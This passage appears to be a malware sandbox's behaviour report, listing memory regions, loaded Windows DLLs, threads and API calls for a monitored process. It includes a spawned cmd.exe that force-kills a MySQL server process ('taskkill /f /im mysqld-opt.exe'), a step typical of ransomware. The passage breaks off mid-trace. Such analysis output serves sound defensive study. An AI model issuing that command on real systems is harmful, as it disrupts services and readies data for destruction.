entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3678 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3679 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3680 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3681 start_va = 0x4400000 end_va = 0x46bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 3682 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3683 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3684 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3685 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 3686 start_va = 0x4400000 end_va = 0x44bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3687 start_va = 0x45c0000 end_va = 0x46bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000045c0000" filename = "" Region: id = 3688 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3689 start_va = 0x74650000 end_va = 0x746cafff monitored = 0 entry_point = 0x7466e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 3690 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3691 start_va = 0x4160000 end_va = 0x419ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004160000" filename = "" Region: id = 3692 start_va = 0x41a0000 end_va = 0x41dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041a0000" filename = "" Region: id = 3693 start_va = 0x76ae0000 end_va = 0x76b23fff monitored = 0 entry_point = 0x76af9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3694 start_va = 0x75260000 end_va = 0x7530cfff monitored = 0 entry_point = 0x75274f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3695 start_va = 0x74450000 end_va = 0x7446dfff monitored = 0 entry_point = 0x7445b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3696 start_va = 0x74440000 end_va = 0x74449fff monitored = 0 entry_point = 0x74442a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3697 start_va = 0x74590000 end_va = 0x745e7fff monitored = 0 entry_point = 0x745d25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 3698 start_va = 0x77450000 end_va = 0x77596fff monitored = 0 entry_point = 0x77461cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3699 start_va = 0x76b30000 end_va = 0x76c7efff monitored = 0 entry_point = 0x76be6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3700 start_va = 0x753c0000 end_va = 0x75451fff monitored = 0 entry_point = 0x753f8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 3701 start_va = 0x6cd80000 end_va = 0x6cd95fff monitored = 0 entry_point = 0x6cd821d0 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 3702 start_va = 0x6cda0000 end_va = 0x6cda7fff monitored = 0 entry_point = 0x6cda17b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 3703 start_va = 0x77290000 end_va = 0x7744cfff monitored = 0 entry_point = 0x77372a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 3704 start_va = 0x75310000 end_va = 0x7536efff monitored = 0 entry_point = 0x75314af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 3705 start_va = 0x77240000 end_va = 0x77284fff monitored = 0 entry_point = 0x7725de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 3706 start_va = 0x6ccb0000 end_va = 0x6cceefff monitored = 0 entry_point = 0x6ccc46c0 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 3707 start_va = 0x6c9a0000 end_va = 0x6cadefff monitored = 0 entry_point = 0x6c9cd880 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 3708 start_va = 0x6cd60000 end_va = 0x6cd7bfff monitored = 0 entry_point = 0x6cd64720 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 3709 start_va = 0x6cd50000 end_va = 0x6cd59fff monitored = 0 entry_point = 0x6cd528d0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 3710 start_va = 0x44c0000 end_va = 0x456ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044c0000" filename = "" Region: id = 3711 start_va = 0x44c0000 end_va = 0x44e9fff monitored = 0 entry_point = 0x44c5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3712 start_va = 0x4560000 end_va = 0x456ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004560000" filename = "" Region: id = 3713 start_va = 0x46c0000 end_va = 0x4847fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000046c0000" filename = "" Region: id = 3714 start_va = 0x74ea0000 end_va = 0x74ecafff monitored = 0 entry_point = 0x74ea5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3715 start_va = 0x4850000 end_va = 0x49d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004850000" filename = "" Region: id = 3716 start_va = 0x49e0000 end_va = 0x5ddffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000049e0000" filename = "" Region: id = 3717 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3718 start_va = 0x4130000 end_va = 0x4130fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004130000" filename = "" Region: id = 3719 start_va = 0x4140000 end_va = 0x4144fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui") Region: id = 3720 start_va = 0x41e0000 end_va = 0x41e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 3721 start_va = 0x41f0000 end_va = 0x41f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041f0000" filename = "" Region: id = 3722 start_va = 0x5de0000 end_va = 0x6116fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3723 start_va = 0x6120000 end_va = 0x6209fff monitored = 0 entry_point = 0x615d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 3724 start_va = 0x44c0000 end_va = 0x44c3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044c0000" filename = "" Region: id = 3725 start_va = 0x6120000 end_va = 0x61fffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 3726 start_va = 0x76e20000 end_va = 0x76e2bfff monitored = 0 entry_point = 0x76e23930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 3727 start_va = 0x44d0000 end_va = 0x44d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044d0000" filename = "" Region: id = 3728 start_va = 0x76c80000 end_va = 0x76d03fff monitored = 0 entry_point = 0x76ca6220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 3729 start_va = 0x44e0000 end_va = 0x44e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044e0000" filename = "" Region: id = 3730 start_va = 0x6cca0000 end_va = 0x6ccacfff monitored = 0 entry_point = 0x6cca3520 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 3731 start_va = 0x6cc30000 end_va = 0x6cc96fff monitored = 0 entry_point = 0x6cc4b610 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 3732 start_va = 0x740f0000 end_va = 0x7410afff monitored = 0 entry_point = 0x740f9050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 3733 start_va = 0x6cbe0000 end_va = 0x6cc23fff monitored = 0 entry_point = 0x6cbfaaf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 3734 start_va = 0x44f0000 end_va = 0x452ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044f0000" filename = "" Region: id = 3735 start_va = 0x4570000 end_va = 0x45affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004570000" filename = "" Region: id = 3736 start_va = 0x6200000 end_va = 0x623ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006200000" filename = "" Region: id = 3737 start_va = 0x6240000 end_va = 0x627ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006240000" filename = "" Region: id = 3738 start_va = 0x6280000 end_va = 0x62bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006280000" filename = "" Region: id = 3739 start_va = 0x62c0000 end_va = 0x62fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000062c0000" filename = "" Region: id = 3740 start_va = 0x6cbc0000 end_va = 0x6cbd0fff monitored = 0 entry_point = 0x6cbc8fa0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 3741 start_va = 0x6c8e0000 end_va = 0x6c99efff monitored = 0 entry_point = 0x6c911e80 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 3743 start_va = 0x4530000 end_va = 0x4535fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004530000" filename = "" Thread: id = 265 os_tid = 0x968 Thread: id = 266 os_tid = 0xa68 Thread: id = 267 os_tid = 0x8cc Thread: id = 268 os_tid = 0xc70 Thread: id = 269 os_tid = 0x888 Process: id = "50" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x2f8f8000" os_pid = "0xc40" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x110c" cmd_line = "cmd.exe /c \"taskkill /f /im mysqld-opt.exe \"" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3748 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3749 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3750 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3751 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 3752 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 3753 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 3754 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3755 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 3756 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3757 start_va = 0xf10000 end_va = 0xf61fff monitored = 1 entry_point = 0xf24fd0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 3758 start_va = 0xf70000 end_va = 0x4f6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f70000" filename = "" Region: id = 3759 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3760 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3761 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3762 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3763 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 3764 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3765 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 3766 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 3767 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3768 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3769 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3770 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3771 start_va = 0x4e0000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 3772 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3773 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3774 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3775 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 3776 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3777 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3778 start_va = 0x600000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 3779 start_va = 0x640000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3780 start_va = 0x740000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 3781 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3782 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3783 start_va = 0x820000 end_va = 0xb56fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 272 os_tid = 0x64c [0193.548] GetModuleHandleA (lpModuleName=0x0) returned 0xf10000 [0193.548] __set_app_type (_Type=0x1) [0193.548] __p__fmode () returned 0x74974d6c [0193.548] __p__commode () returned 0x74975b1c [0193.548] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xf25200) returned 0x0 [0193.548] __getmainargs (in: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0, _DoWildCard=0, _StartInfo=0xf360fc | out: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0) returned 0 [0193.549] GetCurrentThreadId () returned 0x64c [0193.549] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x64c) returned 0x78 [0193.549] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0193.549] GetProcAddress (hModule=0x75600000, lpProcName="SetThreadUILanguage") returned 0x75642510 [0193.549] SetThreadUILanguage (LangId=0x0) returned 0x409 [0193.560] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0193.560] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ff18 | out: phkResult=0x19ff18*=0x0) returned 0x2 [0193.561] VirtualQuery (in: lpAddress=0x19ff1f, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x19f000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0193.561] VirtualQuery (in: lpAddress=0xa0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa0000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0193.561] VirtualQuery (in: lpAddress=0xa1000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa1000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0193.561] VirtualQuery (in: lpAddress=0xa3000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa3000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0193.561] VirtualQuery (in: lpAddress=0x1a0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x1a0000, AllocationBase=0x1a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0193.561] GetConsoleOutputCP () returned 0x1b5 [0193.563] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0193.563] SetConsoleCtrlHandler (HandlerRoutine=0xf30e40, Add=1) returned 1 [0193.563] _get_osfhandle (_FileHandle=1) returned 0x140 [0193.563] SetConsoleMode (hConsoleHandle=0x140, dwMode=0x0) returned 0 [0193.563] _get_osfhandle (_FileHandle=1) returned 0x140 [0193.563] GetConsoleMode (in: hConsoleHandle=0x140, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0193.563] _get_osfhandle (_FileHandle=0) returned 0x13c [0193.563] GetConsoleMode (in: hConsoleHandle=0x13c, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0193.563] GetEnvironmentStringsW () returned 0x507cc8* [0193.563] GetProcessHeap () returned 0x500000 [0193.564] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0xa1a) returned 0x5086f0 [0193.564] FreeEnvironmentStringsA (penv="A") returned 1 [0193.564] GetProcessHeap () returned 0x500000 [0193.564] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x4) returned 0x500550 [0193.564] GetEnvironmentStringsW () returned 0x507cc8* [0193.564] GetProcessHeap () returned 0x500000 [0193.564] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0xa1a) returned 0x509118 [0193.564] FreeEnvironmentStringsA (penv="A") returned 1 [0193.564] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0193.564] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x49, lpcbData=0x19ee80*=0x1000) returned 0x2 [0193.565] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0193.565] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0193.565] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0193.565] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0193.565] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0193.565] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0193.565] RegCloseKey (hKey=0x88) returned 0x0 [0193.565] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0193.565] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0193.565] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0193.565] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, 